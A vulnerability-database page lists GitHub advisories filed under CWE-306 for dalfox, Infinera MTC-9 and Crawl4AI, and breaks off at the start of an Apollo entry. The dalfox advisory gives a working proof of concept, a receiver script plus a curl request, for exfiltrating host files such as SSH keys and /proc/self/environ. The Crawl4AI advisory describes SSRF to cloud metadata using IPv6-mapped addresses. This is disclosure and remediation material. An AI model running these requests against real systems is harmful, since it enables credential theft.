Common Weakness Enumeration

CWE-306

Allowed

Missing Authentication for Critical Function

Abstraction: Base · Status: Draft

The product does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources.

3465 vulnerabilities reference this CWE, most recent first.

GHSA-35WR-X7V6-9FV2

Vulnerability from github – Published: 2026-05-12 15:08 – Updated: 2026-06-08 23:50
VLAI
Summary
Dalfox Server Mode has an Unauthenticated Arbitrary File Read with Out-of-Band Exfiltration via `custom-payload-file`
Details

Summary

When dalfox is run in REST API server mode, the custom-payload-file field in model.Options is JSON-tagged and deserialized directly from the attacker's request body, then propagated unchanged through dalfox.Initialize into the scan engine. The engine passes the value to voltFile.ReadLinesOrLiteral, which reads lines from any file path accessible to the dalfox process and embeds each line as an XSS payload in outbound HTTP requests directed at the attacker-controlled target URL. Because the server has no API key by default, an unauthenticated network attacker can exfiltrate the contents of arbitrary files on the dalfox host by reading them line-by-line through scan traffic.

Severity

High (CVSS 3.1: 7.5)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

  • Attack Vector: Network — server binds to 0.0.0.0:6664 by default; reachable by any network peer.
  • Attack Complexity: Low — no preconditions beyond network access; skip-discovery and param are both attacker-supplied, so the code path is fully under attacker control.
  • Privileges Required: None — --api-key defaults to "", so the auth middleware is not registered.
  • User Interaction: None.
  • Scope: Unchanged — the file read and the outbound HTTP exfiltration request both originate from the same dalfox process authority.
  • Confidentiality Impact: High — the attacker can read any file the dalfox process can open: private keys, configuration files containing database credentials, environment files, /etc/passwd, etc.
  • Integrity Impact: None — this path is read-only.
  • Availability Impact: None.

Affected Component

  • cmd/server.goinit() (line 51): --api-key defaults to "" — no auth by default
  • pkg/server/server.gosetupEchoServer() (line 68): auth middleware only registered when APIKey != ""
  • pkg/server/server.gopostScanHandler() (lines 173–191): rq.Options (including CustomPayloadFile) passed to ScanFromAPI without sanitization
  • lib/func.goInitialize() (line 117): CustomPayloadFile explicitly propagated from caller options
  • pkg/scanning/scan.go — anonymous block (lines 341–368): voltFile.ReadLinesOrLiteral(options.CustomPayloadFile) reads file; contents injected into outbound requests

CWE

  • CWE-306: Missing Authentication for Critical Function
  • CWE-73: External Control of File Name or Path
  • CWE-552: Files or Directories Accessible to External Parties

Description

custom-payload-file Is Fully Attacker-Controlled

model.Options exposes CustomPayloadFile with a JSON tag:

// pkg/model/options.go:33
CustomPayloadFile string `json:"custom-payload-file,omitempty"`

postScanHandler binds the entire Req.Options from the JSON body and passes it directly to ScanFromAPI:

// pkg/server/server.go:173-191
rq := new(Req)
if err := c.Bind(rq); err != nil { ... }
go ScanFromAPI(rq.URL, rq.Options, *options, sid)

ScanFromAPI passes rqOptions as target.Options to dalfox.Initialize:

// pkg/server/scan.go:22-27
target := dalfox.Target{
    URL:     url,
    Method:  rqOptions.Method,
    Options: rqOptions,
}
newOptions := dalfox.Initialize(target, target.Options)

Initialize explicitly copies CustomPayloadFile into newOptions with no filtering:

// lib/func.go:117
"CustomPayloadFile": {&newOptions.CustomPayloadFile, options.CustomPayloadFile},

File Read and Exfiltration Path

In pkg/scanning/scan.go, when the scan engine reaches the custom payload phase, it reads the attacker-specified file path:

// pkg/scanning/scan.go:341-366
if (options.SkipDiscovery || utils.IsAllowType(policy["Content-Type"])) && options.CustomPayloadFile != "" {
    ff, err := voltFile.ReadLinesOrLiteral(options.CustomPayloadFile)
    if err != nil {
        printing.DalLog("SYSTEM", "Failed to load custom XSS payload file", options)
    } else {
        for _, customPayload := range ff {
            if customPayload != "" {
                for k, v := range params {
                    if optimization.CheckInspectionParam(options, k) {
                        ...
                        tq, tm := optimization.MakeRequestQuery(target, k, customPayload, "inHTML"+ptype, "toAppend", encoder, options)
                        query[tq] = tm
                    }
                }
            }
        }
    }
}

Each line of the file becomes a payload value embedded in a query parameter of an HTTP request sent to the attacker-controlled target URL. performScanning then dispatches every entry in the query map via SendReq, delivering the file's contents to the attacker's server as the value of the nominated parameter (e.g., ?q=<file-line>).

Condition Is Trivially Satisfiable

The condition options.SkipDiscovery || utils.IsAllowType(policy["Content-Type"]) is satisfied by setting skip-discovery: true in the JSON request body — a field the attacker fully controls. When SkipDiscovery is true, the engine also requires at least one parameter via UniqParam (the -p flag), which the attacker supplies as param: ["q"]. The code then hardcodes policy["Content-Type"] = "text/html" and populates params["q"] automatically:

// pkg/scanning/scan.go:224-240
if len(options.UniqParam) == 0 {
    return scanResult, fmt.Errorf("--skip-discovery requires parameters to be specified with -p flag")
}
for _, paramName := range options.UniqParam {
    params[paramName] = model.ParamResult{
        Name: paramName, Type: "URL", Reflected: true, Chars: payload.GetSpecialChar(),
    }
}
policy["Content-Type"] = "text/html"

Both conditions are fully attacker-controlled through the JSON request body.

No Defense at Any Layer

The same opt-in API key guard from the first finding applies identically here:

// pkg/server/server.go:68-70
if options.ServerType == "rest" && options.APIKey != "" {
    e.Use(apiKeyAuth(options.APIKey, options))
}

With the default empty API key, no middleware is installed and every endpoint is unauthenticated. There is no path sanitization, no allowlist, and no IsAPI guard around the CustomPayloadFile read.

Proof of Concept

# Step 1 — Attacker-controlled receiver (logs q= parameter to stdout)
python3 - <<'PY'
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs
class H(BaseHTTPRequestHandler):
    def do_GET(self):
        q = parse_qs(urlparse(self.path).query).get('q', [''])[0]
        print("[RECEIVED] q =", q, flush=True)
        body = b'<html><body>ok</body></html>'
        self.send_response(200)
        self.send_header('Content-Type', 'text/html')
        self.send_header('Content-Length', str(len(body)))
        self.end_headers()
        self.wfile.write(body)
    def log_message(self, *a): pass
HTTPServer(('127.0.0.1', 18081), H).serve_forever()
PY

# Step 2 — Start dalfox REST server (default: no API key)
go run . server --host 127.0.0.1 --port 16664 --type rest

# Step 3 — Exfiltrate /etc/hostname (or any file readable by the dalfox process)
curl -s -X POST http://127.0.0.1:16664/scan \
  -H 'Content-Type: application/json' \
  --data '{
    "url": "http://127.0.0.1:18081/?q=test",
    "options": {
      "custom-payload-file": "/etc/hostname",
      "only-custom-payload": true,
      "skip-discovery": true,
      "param": ["q"],
      "use-headless": false,
      "worker": 1
    }
  }'

# Expected output on the receiver (Step 1 terminal):
# [RECEIVED] q = myhostname.local

# For multi-line files (e.g. /etc/passwd), each line arrives as a separate request

No X-API-KEY header is required. Replace /etc/hostname with any file path accessible to the dalfox process (e.g., ~/.ssh/id_rsa, /run/secrets/db_password, /proc/self/environ).

Impact

  • Arbitrary file read on the dalfox host: any file readable by the dalfox process (SSH private keys, TLS certificates, .env files, cloud credential files, /proc/self/environ) can be exfiltrated one line at a time.
  • No authentication required under the default configuration.
  • The exfiltration channel is the dalfox host's own outbound HTTP scan traffic — no inbound connection from the attacker to the dalfox host is needed beyond the initial REST API call.
  • Combined with the found-action RCE finding (separate issue), an attacker could first read /proc/self/environ to harvest secrets, then execute commands.

Recommended Remediation

Option 1: Strip filesystem-dangerous fields from API-sourced requests (preferred)

Apply a denylist of fields that should never be accepted from the REST API, regardless of auth state. This protects authenticated deployments against credential-theft or privilege escalation by external API consumers:

// pkg/server/server.go — in postScanHandler, before ScanFromAPI:
rq.Options.CustomPayloadFile = ""
rq.Options.CustomBlindXSSPayloadFile = ""
rq.Options.FoundAction = ""
rq.Options.FoundActionShell = ""
rq.Options.OutputFile = ""
rq.Options.HarFilePath = ""

Option 2: Require --api-key at server startup

Make authentication mandatory and refuse to start without it:

// cmd/server.go — in runServerCmd:
if serverType == "rest" && apiKey == "" {
    fmt.Fprintln(os.Stderr, "ERROR: --api-key is required when running in REST server mode.")
    os.Exit(1)
}

Both options should be applied together. Option 2 prevents unauthenticated access to the API entirely; Option 1 ensures that even trusted API callers cannot leverage the server to read files from the host filesystem.

Credit

Emmanuel David

Github:- https://github.com/drmingler

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.12.0"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/hahwul/dalfox/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.13.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-45088"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306",
      "CWE-552",
      "CWE-73"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-12T15:08:13Z",
    "nvd_published_at": "2026-05-27T18:16:24Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nWhen dalfox is run in REST API server mode, the `custom-payload-file` field in `model.Options` is JSON-tagged and deserialized directly from the attacker\u0027s request body, then propagated unchanged through `dalfox.Initialize` into the scan engine. The engine passes the value to `voltFile.ReadLinesOrLiteral`, which reads lines from any file path accessible to the dalfox process and embeds each line as an XSS payload in outbound HTTP requests directed at the attacker-controlled target URL. Because the server has no API key by default, an unauthenticated network attacker can exfiltrate the contents of arbitrary files on the dalfox host by reading them line-by-line through scan traffic.\n\n## Severity\n\n**High** (CVSS 3.1: 7.5)\n\n`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`\n\n- **Attack Vector:** Network \u2014 server binds to `0.0.0.0:6664` by default; reachable by any network peer.\n- **Attack Complexity:** Low \u2014 no preconditions beyond network access; `skip-discovery` and `param` are both attacker-supplied, so the code path is fully under attacker control.\n- **Privileges Required:** None \u2014 `--api-key` defaults to `\"\"`, so the auth middleware is not registered.\n- **User Interaction:** None.\n- **Scope:** Unchanged \u2014 the file read and the outbound HTTP exfiltration request both originate from the same dalfox process authority.\n- **Confidentiality Impact:** High \u2014 the attacker can read any file the dalfox process can open: private keys, configuration files containing database credentials, environment files, `/etc/passwd`, etc.\n- **Integrity Impact:** None \u2014 this path is read-only.\n- **Availability Impact:** None.\n\n## Affected Component\n\n- `cmd/server.go` \u2014 `init()` (line 51): `--api-key` defaults to `\"\"` \u2014 no auth by default\n- `pkg/server/server.go` \u2014 `setupEchoServer()` (line 68): auth middleware only registered when `APIKey != \"\"`\n- `pkg/server/server.go` \u2014 `postScanHandler()` (lines 173\u2013191): `rq.Options` (including `CustomPayloadFile`) passed to `ScanFromAPI` without sanitization\n- `lib/func.go` \u2014 `Initialize()` (line 117): `CustomPayloadFile` explicitly propagated from caller options\n- `pkg/scanning/scan.go` \u2014 anonymous block (lines 341\u2013368): `voltFile.ReadLinesOrLiteral(options.CustomPayloadFile)` reads file; contents injected into outbound requests\n\n## CWE\n\n- **CWE-306**: Missing Authentication for Critical Function\n- **CWE-73**: External Control of File Name or Path\n- **CWE-552**: Files or Directories Accessible to External Parties\n\n## Description\n\n### `custom-payload-file` Is Fully Attacker-Controlled\n\n`model.Options` exposes `CustomPayloadFile` with a JSON tag:\n\n```go\n// pkg/model/options.go:33\nCustomPayloadFile string `json:\"custom-payload-file,omitempty\"`\n```\n\n`postScanHandler` binds the entire `Req.Options` from the JSON body and passes it directly to `ScanFromAPI`:\n\n```go\n// pkg/server/server.go:173-191\nrq := new(Req)\nif err := c.Bind(rq); err != nil { ... }\ngo ScanFromAPI(rq.URL, rq.Options, *options, sid)\n```\n\n`ScanFromAPI` passes `rqOptions` as `target.Options` to `dalfox.Initialize`:\n\n```go\n// pkg/server/scan.go:22-27\ntarget := dalfox.Target{\n    URL:     url,\n    Method:  rqOptions.Method,\n    Options: rqOptions,\n}\nnewOptions := dalfox.Initialize(target, target.Options)\n```\n\n`Initialize` explicitly copies `CustomPayloadFile` into `newOptions` with no filtering:\n\n```go\n// lib/func.go:117\n\"CustomPayloadFile\": {\u0026newOptions.CustomPayloadFile, options.CustomPayloadFile},\n```\n\n### File Read and Exfiltration Path\n\nIn `pkg/scanning/scan.go`, when the scan engine reaches the custom payload phase, it reads the attacker-specified file path:\n\n```go\n// pkg/scanning/scan.go:341-366\nif (options.SkipDiscovery || utils.IsAllowType(policy[\"Content-Type\"])) \u0026\u0026 options.CustomPayloadFile != \"\" {\n    ff, err := voltFile.ReadLinesOrLiteral(options.CustomPayloadFile)\n    if err != nil {\n        printing.DalLog(\"SYSTEM\", \"Failed to load custom XSS payload file\", options)\n    } else {\n        for _, customPayload := range ff {\n            if customPayload != \"\" {\n                for k, v := range params {\n                    if optimization.CheckInspectionParam(options, k) {\n                        ...\n                        tq, tm := optimization.MakeRequestQuery(target, k, customPayload, \"inHTML\"+ptype, \"toAppend\", encoder, options)\n                        query[tq] = tm\n                    }\n                }\n            }\n        }\n    }\n}\n```\n\nEach line of the file becomes a payload value embedded in a query parameter of an HTTP request sent to the attacker-controlled target URL. `performScanning` then dispatches every entry in the `query` map via `SendReq`, delivering the file\u0027s contents to the attacker\u0027s server as the value of the nominated parameter (e.g., `?q=\u003cfile-line\u003e`).\n\n### Condition Is Trivially Satisfiable\n\nThe condition `options.SkipDiscovery || utils.IsAllowType(policy[\"Content-Type\"])` is satisfied by setting `skip-discovery: true` in the JSON request body \u2014 a field the attacker fully controls. When `SkipDiscovery` is true, the engine also requires at least one parameter via `UniqParam` (the `-p` flag), which the attacker supplies as `param: [\"q\"]`. The code then hardcodes `policy[\"Content-Type\"] = \"text/html\"` and populates `params[\"q\"]` automatically:\n\n```go\n// pkg/scanning/scan.go:224-240\nif len(options.UniqParam) == 0 {\n    return scanResult, fmt.Errorf(\"--skip-discovery requires parameters to be specified with -p flag\")\n}\nfor _, paramName := range options.UniqParam {\n    params[paramName] = model.ParamResult{\n        Name: paramName, Type: \"URL\", Reflected: true, Chars: payload.GetSpecialChar(),\n    }\n}\npolicy[\"Content-Type\"] = \"text/html\"\n```\n\nBoth conditions are fully attacker-controlled through the JSON request body.\n\n### No Defense at Any Layer\n\nThe same opt-in API key guard from the first finding applies identically here:\n\n```go\n// pkg/server/server.go:68-70\nif options.ServerType == \"rest\" \u0026\u0026 options.APIKey != \"\" {\n    e.Use(apiKeyAuth(options.APIKey, options))\n}\n```\n\nWith the default empty API key, no middleware is installed and every endpoint is unauthenticated. There is no path sanitization, no allowlist, and no `IsAPI` guard around the `CustomPayloadFile` read.\n\n## Proof of Concept\n\n```bash\n# Step 1 \u2014 Attacker-controlled receiver (logs q= parameter to stdout)\npython3 - \u003c\u003c\u0027PY\u0027\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom urllib.parse import urlparse, parse_qs\nclass H(BaseHTTPRequestHandler):\n    def do_GET(self):\n        q = parse_qs(urlparse(self.path).query).get(\u0027q\u0027, [\u0027\u0027])[0]\n        print(\"[RECEIVED] q =\", q, flush=True)\n        body = b\u0027\u003chtml\u003e\u003cbody\u003eok\u003c/body\u003e\u003c/html\u003e\u0027\n        self.send_response(200)\n        self.send_header(\u0027Content-Type\u0027, \u0027text/html\u0027)\n        self.send_header(\u0027Content-Length\u0027, str(len(body)))\n        self.end_headers()\n        self.wfile.write(body)\n    def log_message(self, *a): pass\nHTTPServer((\u0027127.0.0.1\u0027, 18081), H).serve_forever()\nPY\n\n# Step 2 \u2014 Start dalfox REST server (default: no API key)\ngo run . server --host 127.0.0.1 --port 16664 --type rest\n\n# Step 3 \u2014 Exfiltrate /etc/hostname (or any file readable by the dalfox process)\ncurl -s -X POST http://127.0.0.1:16664/scan \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  --data \u0027{\n    \"url\": \"http://127.0.0.1:18081/?q=test\",\n    \"options\": {\n      \"custom-payload-file\": \"/etc/hostname\",\n      \"only-custom-payload\": true,\n      \"skip-discovery\": true,\n      \"param\": [\"q\"],\n      \"use-headless\": false,\n      \"worker\": 1\n    }\n  }\u0027\n\n# Expected output on the receiver (Step 1 terminal):\n# [RECEIVED] q = myhostname.local\n\n# For multi-line files (e.g. /etc/passwd), each line arrives as a separate request\n```\n\nNo `X-API-KEY` header is required. Replace `/etc/hostname` with any file path accessible to the dalfox process (e.g., `~/.ssh/id_rsa`, `/run/secrets/db_password`, `/proc/self/environ`).\n\n## Impact\n\n- **Arbitrary file read** on the dalfox host: any file readable by the dalfox process (SSH private keys, TLS certificates, `.env` files, cloud credential files, `/proc/self/environ`) can be exfiltrated one line at a time.\n- **No authentication required** under the default configuration.\n- The exfiltration channel is the dalfox host\u0027s own outbound HTTP scan traffic \u2014 no inbound connection from the attacker to the dalfox host is needed beyond the initial REST API call.\n- Combined with the `found-action` RCE finding (separate issue), an attacker could first read `/proc/self/environ` to harvest secrets, then execute commands.\n\n## Recommended Remediation\n\n### Option 1: Strip filesystem-dangerous fields from API-sourced requests (preferred)\n\nApply a denylist of fields that should never be accepted from the REST API, regardless of auth state. This protects authenticated deployments against credential-theft or privilege escalation by external API consumers:\n\n```go\n// pkg/server/server.go \u2014 in postScanHandler, before ScanFromAPI:\nrq.Options.CustomPayloadFile = \"\"\nrq.Options.CustomBlindXSSPayloadFile = \"\"\nrq.Options.FoundAction = \"\"\nrq.Options.FoundActionShell = \"\"\nrq.Options.OutputFile = \"\"\nrq.Options.HarFilePath = \"\"\n```\n\n### Option 2: Require `--api-key` at server startup\n\nMake authentication mandatory and refuse to start without it:\n\n```go\n// cmd/server.go \u2014 in runServerCmd:\nif serverType == \"rest\" \u0026\u0026 apiKey == \"\" {\n    fmt.Fprintln(os.Stderr, \"ERROR: --api-key is required when running in REST server mode.\")\n    os.Exit(1)\n}\n```\n\nBoth options should be applied together. Option 2 prevents unauthenticated access to the API entirely; Option 1 ensures that even trusted API callers cannot leverage the server to read files from the host filesystem.\n\n##Credit\n\nEmmanuel David\n\nGithub:- https://github.com/drmingler",
  "id": "GHSA-35wr-x7v6-9fv2",
  "modified": "2026-06-08T23:50:09Z",
  "published": "2026-05-12T15:08:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/hahwul/dalfox/security/advisories/GHSA-35wr-x7v6-9fv2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45088"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/hahwul/dalfox"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hahwul/dalfox/releases/tag/v2.13.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Dalfox Server Mode has an Unauthenticated Arbitrary File Read with Out-of-Band Exfiltration via `custom-payload-file`"
}

GHSA-3645-F6QV-W99W

Vulnerability from github – Published: 2025-12-08 12:30 – Updated: 2025-12-08 12:30
VLAI
Details

Improper configuration of the SSH service in Infinera MTC-9 allows an unauthenticated attacker to execute arbitrary commands and access data on file system

.

This issue affects MTC-9: from R22.1.1.0275 before R23.0.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-27020"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-12-08T10:16:01Z",
    "severity": "CRITICAL"
  },
  "details": "Improper configuration of the SSH service in Infinera MTC-9 allows an unauthenticated attacker to execute arbitrary commands and access data on file system\n\n.\n\n\nThis issue affects MTC-9: from R22.1.1.0275 before R23.0.",
  "id": "GHSA-3645-f6qv-w99w",
  "modified": "2025-12-08T12:30:25Z",
  "published": "2025-12-08T12:30:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27020"
    },
    {
      "type": "WEB",
      "url": "https://www.cvcn.gov.it/cvcn/cve/CVE-2025-27020"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-365W-HQF6-VXFG

Vulnerability from github – Published: 2026-06-16 20:13 – Updated: 2026-06-24 13:05
VLAI
Summary
Crawl4AI: Multiple Docker API Vulnerabilities - File Write, SSRF, Auth Bypass, XSS, JS Execution
Details

Summary

Multiple security vulnerabilities in the Crawl4AI Docker API server affecting endpoints for crawling, markdown/LLM extraction, screenshots, PDFs, webhooks, monitoring, JavaScript execution, and configuration.

Vulnerabilities

1. Arbitrary File Write via /screenshot and /pdf (CWE-22, CVSS 9.1)

The output_path parameter accepts arbitrary filesystem paths with no validation. An attacker can overwrite server files (DoS) or write to any appuser-writable location.

Fix: Added validate_output_path() restricting writes to CRAWL4AI_OUTPUT_DIR (/tmp/crawl4ai-outputs by default). Added Pydantic field_validator rejecting .. traversal sequences.

2. SSRF via Webhook URL (CWE-918, CVSS 8.6)

Webhook URLs in /crawl/job and /llm/job accept internal/private IPs with no validation, enabling Server-Side Request Forgery against cloud metadata endpoints (169.254.169.254), internal services, and Docker networks.

Fix: Added validate_webhook_url() with blocklist for RFC 1918, loopback, link-local, cloud metadata IPs and hostnames. Validation at both job submission and send time. Explicit follow_redirects=False.

3. Authentication Bypass on Monitor Endpoints (CWE-306, CVSS 6.5)

The monitor router was mounted without token_dep dependency, making all monitoring endpoints (including destructive ones like /monitor/actions/cleanup) accessible without authentication.

Fix: Added dependencies=[Depends(token_dep)] to monitor router. Added explicit token check on WebSocket /monitor/ws endpoint.

4. Stored XSS in Monitor Dashboard (CWE-79, CVSS 6.1)

URLs and error messages rendered in the monitor dashboard via innerHTML without escaping, enabling stored XSS via crafted crawl URLs.

Fix: Server-side html.escape() on URL and error storage. Client-side escapeHtml() wrapper on all innerHTML template injections.

5. Arbitrary JavaScript Execution via /execute_js (CWE-94, CVSS 8.1)

The /execute_js endpoint accepts and executes arbitrary JavaScript in the server's browser with --disable-web-security enabled, combining arbitrary JS execution with SSRF capability.

Fix: Disabled by default via CRAWL4AI_EXECUTE_JS_ENABLED env var. Added SSRF blocklist on destination URL. Removed --disable-web-security from default browser args.

6. Hardcoded JWT Secret Key (CWE-798, CVSS 9.8)

The JWT signing key defaults to "mysecret" in the public source code, allowing anyone to forge valid authentication tokens.

Fix: Removed default value. Added startup validation rejecting weak/short secrets. Auto-generates ephemeral key when JWT enabled but no key set.

7. SSRF via Direct Crawl Endpoints /crawl, /md, /llm (CWE-918, CVSS 8.6)

The primary crawl entry points (/crawl, /crawl/stream, /md, /llm) fetch arbitrary user-supplied URLs with no destination validation, enabling Server-Side Request Forgery against internal services, Docker networks, and cloud metadata endpoints (169.254.169.254). A blocklist that only inspects the literal hostname is additionally bypassable via IPv6-mapped IPv4 addresses (e.g. [::ffff:169.254.169.254], [::ffff:10.0.0.1]), which resolve to the blocked private/metadata ranges but evade a naive string check.

Fix: Added URL destination validation on all crawl/md/llm entry points, reusing the SSRF blocklist (RFC 1918, loopback, link-local, cloud-metadata IPs and hostnames). IPv6-mapped IPv4 addresses are normalized to their IPv4 form before the blocklist check, closing the mapping bypass. raw:// URLs are skipped. Validation applies at request entry, not only at fetch time.

Workarounds

  1. Upgrade to the patched version (recommended)
  2. Set CRAWL4AI_API_TOKEN to enable authentication
  3. Set a strong SECRET_KEY (min 32 chars) if using JWT
  4. Restrict network access to the Docker API

Credits

  • Jeongbean Jeon - file write, SSRF, monitor auth bypass, stored XSS
  • wulonchia - file write via output_path (independent report)
  • by111 (August829) - hardcoded JWT, eval in /config/dump, /execute_js, hook sandbox escape
  • secsys_codex - SSRF via /md, /crawl, /llm endpoints + IPv6-mapped IPv4 bypass (URL destination validation)
  • Velayutham Selvaraj (LinkedIn) - SSRF via missing host validation in validate_url_scheme (independent report)
  • IcySun & Yashon - SSRF, arbitrary file write, missing-auth-by-default, hook sandbox bypass via asyncio (independent report)
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.8.6"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "crawl4ai"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.8.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-56266"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-306",
      "CWE-79",
      "CWE-798",
      "CWE-918",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-16T20:13:30Z",
    "nvd_published_at": "2026-06-22T22:16:50Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nMultiple security vulnerabilities in the Crawl4AI Docker API server affecting endpoints for crawling, markdown/LLM extraction, screenshots, PDFs, webhooks, monitoring, JavaScript execution, and configuration.\n\n### Vulnerabilities\n\n#### 1. Arbitrary File Write via /screenshot and /pdf (CWE-22, CVSS 9.1)\n\nThe `output_path` parameter accepts arbitrary filesystem paths with no validation. An attacker can overwrite server files (DoS) or write to any appuser-writable location.\n\n**Fix:** Added `validate_output_path()` restricting writes to `CRAWL4AI_OUTPUT_DIR` (/tmp/crawl4ai-outputs by default). Added Pydantic `field_validator` rejecting `..` traversal sequences.\n\n#### 2. SSRF via Webhook URL (CWE-918, CVSS 8.6)\n\nWebhook URLs in `/crawl/job` and `/llm/job` accept internal/private IPs with no validation, enabling Server-Side Request Forgery against cloud metadata endpoints (169.254.169.254), internal services, and Docker networks.\n\n**Fix:** Added `validate_webhook_url()` with blocklist for RFC 1918, loopback, link-local, cloud metadata IPs and hostnames. Validation at both job submission and send time. Explicit `follow_redirects=False`.\n\n#### 3. Authentication Bypass on Monitor Endpoints (CWE-306, CVSS 6.5)\n\nThe monitor router was mounted without `token_dep` dependency, making all monitoring endpoints (including destructive ones like `/monitor/actions/cleanup`) accessible without authentication.\n\n**Fix:** Added `dependencies=[Depends(token_dep)]` to monitor router. Added explicit token check on WebSocket `/monitor/ws` endpoint.\n\n#### 4. Stored XSS in Monitor Dashboard (CWE-79, CVSS 6.1)\n\nURLs and error messages rendered in the monitor dashboard via `innerHTML` without escaping, enabling stored XSS via crafted crawl URLs.\n\n**Fix:** Server-side `html.escape()` on URL and error storage. Client-side `escapeHtml()` wrapper on all `innerHTML` template injections.\n\n#### 5. Arbitrary JavaScript Execution via /execute_js (CWE-94, CVSS 8.1)\n\nThe `/execute_js` endpoint accepts and executes arbitrary JavaScript in the server\u0027s browser with `--disable-web-security` enabled, combining arbitrary JS execution with SSRF capability.\n\n**Fix:** Disabled by default via `CRAWL4AI_EXECUTE_JS_ENABLED` env var. Added SSRF blocklist on destination URL. Removed `--disable-web-security` from default browser args.\n\n#### 6. Hardcoded JWT Secret Key (CWE-798, CVSS 9.8)\n\nThe JWT signing key defaults to `\"mysecret\"` in the public source code, allowing anyone to forge valid authentication tokens.\n\n**Fix:** Removed default value. Added startup validation rejecting weak/short secrets. Auto-generates ephemeral key when JWT enabled but no key set.\n\n#### 7. SSRF via Direct Crawl Endpoints /crawl, /md, /llm (CWE-918, CVSS 8.6)\n\nThe primary crawl entry points (`/crawl`, `/crawl/stream`, `/md`, `/llm`) fetch arbitrary user-supplied URLs with no destination validation, enabling Server-Side Request Forgery against internal services, Docker networks, and cloud metadata endpoints (169.254.169.254). A blocklist that only inspects the literal hostname is additionally bypassable via IPv6-mapped IPv4 addresses (e.g. `[::ffff:169.254.169.254]`, `[::ffff:10.0.0.1]`), which resolve to the blocked private/metadata ranges but evade a naive string check.\n\n**Fix:** Added URL destination validation on all crawl/md/llm entry points, reusing the SSRF blocklist (RFC 1918, loopback, link-local, cloud-metadata IPs and hostnames). IPv6-mapped IPv4 addresses are normalized to their IPv4 form before the blocklist check, closing the mapping bypass. `raw://` URLs are skipped. Validation applies at request entry, not only at fetch time.\n\n### Workarounds\n\n1. Upgrade to the patched version (recommended)\n2. Set `CRAWL4AI_API_TOKEN` to enable authentication\n3. Set a strong `SECRET_KEY` (min 32 chars) if using JWT\n4. Restrict network access to the Docker API\n\n### Credits\n\n- Jeongbean Jeon - file write, SSRF, monitor auth bypass, stored XSS\n- wulonchia - file write via output_path (independent report)\n- by111 ([August829](https://github.com/August829)) - hardcoded JWT, eval in /config/dump, /execute_js, hook sandbox escape\n- secsys_codex - SSRF via /md, /crawl, /llm endpoints + IPv6-mapped IPv4 bypass (URL destination validation)\n- Velayutham Selvaraj ([LinkedIn](https://www.linkedin.com/in/velayuthamselvaraj)) - SSRF via missing host validation in validate_url_scheme (independent report)\n- IcySun \u0026 Yashon - SSRF, arbitrary file write, missing-auth-by-default, hook sandbox bypass via asyncio (independent report)",
  "id": "GHSA-365w-hqf6-vxfg",
  "modified": "2026-06-24T13:05:44Z",
  "published": "2026-06-16T20:13:30Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/unclecode/crawl4ai/security/advisories/GHSA-365w-hqf6-vxfg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56266"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/unclecode/crawl4ai"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/crawl4ai-server-side-request-forgery-via-direct-crawl-endpoints"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Crawl4AI: Multiple Docker API Vulnerabilities - File Write, SSRF, Auth Bypass, XSS, JS Execution"
}

GHSA-368X-WMMG-HQ5C

Vulnerability from github – Published: 2023-02-22 21:58 – Updated: 2026-06-08 23:55
VLAI
Summary
Apollo has potential access control security issue in eureka
Details

Impact

